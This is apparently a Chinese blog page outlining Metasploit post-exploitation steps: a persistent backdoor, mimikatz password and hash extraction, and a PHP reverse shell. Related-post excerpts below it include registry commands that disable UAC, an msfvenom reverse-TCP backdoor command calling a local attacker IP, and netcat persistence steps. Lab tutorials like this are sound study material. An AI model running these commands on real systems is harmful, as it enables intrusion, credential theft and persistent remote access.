msf客户端渗透(八):持久后门,mimikatz使用,获取PHP服务器shell

持续后门

先获取一个session

在目标主机上生成持续后门

设置侦听参数

启动侦听

重新启动被攻击的主机

一启动攻击者时获取到session

mimikatz的使用

mimikatz是俄罗斯组织开发的工具

加载mimikatz

help查看命令

msv获取用户名和hash

wdigest获取内存中的明文密码信息

kerberos获取内存中的明文密码信息

查看hash

查看bootkey

查看被攻击主机上运行的进程

查看被攻击主机上运行的服务

查看被攻击主机的加密条件

PHP shell

生成一个payload文件

拷贝到php服务器的home目录下

开启侦听

打开浏览器访问a.php

就获得了一个session

进入shell

时间: 2024-12-30 00:08:50

msf客户端渗透(八):持久后门,mimikatz使用,获取PHP服务器shell的相关文章

msf客户端渗透(二)

这个漏洞利用只在XP上有效 构造pdf exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell

msf客户端渗透(六):抓包

50000个包满了就会自己销毁掉从0个包开始抓 run 搜索文件 破解弱口令 使用system权限的session 结果保存在/tmp里 run执行 MAC时间 windows上按时间来搜文件,可以查看某个时间段对文件系统的操作 修改linux文件时间 当去查看这个文件时,访问时间就会发生变化 对文件修改时,文件的修改时间也发生了变化 msf修改时间

msf客户端渗透(三)

提权,但是失败了,这是由于win7系统上UAC的限制

msf客户端渗透(四):hashdump

如果你获得一个system权限的session 进入到这个session 进入到shell 依次输入以下命令 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Mi

msf客户端渗透(五):注册表

先获取到一个session 上传nc到被攻击主机上 建立一个键值 创建一个策略 kali上查看是否成功创建键值 后台开启cmd 查看防火墙的策略 打开防火墙的端口 添加一条防火墙策略 在win7上查看防火墙策略 win7重启之后防火墙的端口就打开了,而且开启了nc向kali发起连接 kali 侦听444端口就可以建立连接

msf客户端渗透(七):跳板

跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s

msf后渗透

生成exe后门 p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: rgba(255, 255, 255, 0.75) } span.s1 { } msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹sh

《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

四.客户端攻击 客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击. 4.1客户端渗透攻击的安全防护机制 ①DEP DEP(数据执行保护)基本原理是操作系统通过设置内存页的属性,指明数据所在的内存页为不可执行. ②ASLR ASLR(地址空间布局随机化)是系统在运行程序时,不用固定的基地址加载进程及相关工作库文件. 包括:堆地址的随机化,栈基址的随机化,P

Android 博客园客户端 (八) 下拉刷新、分页,AsyncTask

一直以来,无论是博客.新闻.还是推荐用户列表.只能加载固定的数量,也没有刷新功能. 为了实现这个功能,也试过很多第三方的开源控件,如PullToRefreshListVie等.无意中发现了Google官方发布了一个新的控件(SwipeRefreshLayout),支持下拉刷新,这个控件在Google应用中都有出现过.效果也是非常的不错. 具体的使用方法及代码如下: 1 <LinearLayout xmlns:android="http://schemas.android.com/apk/r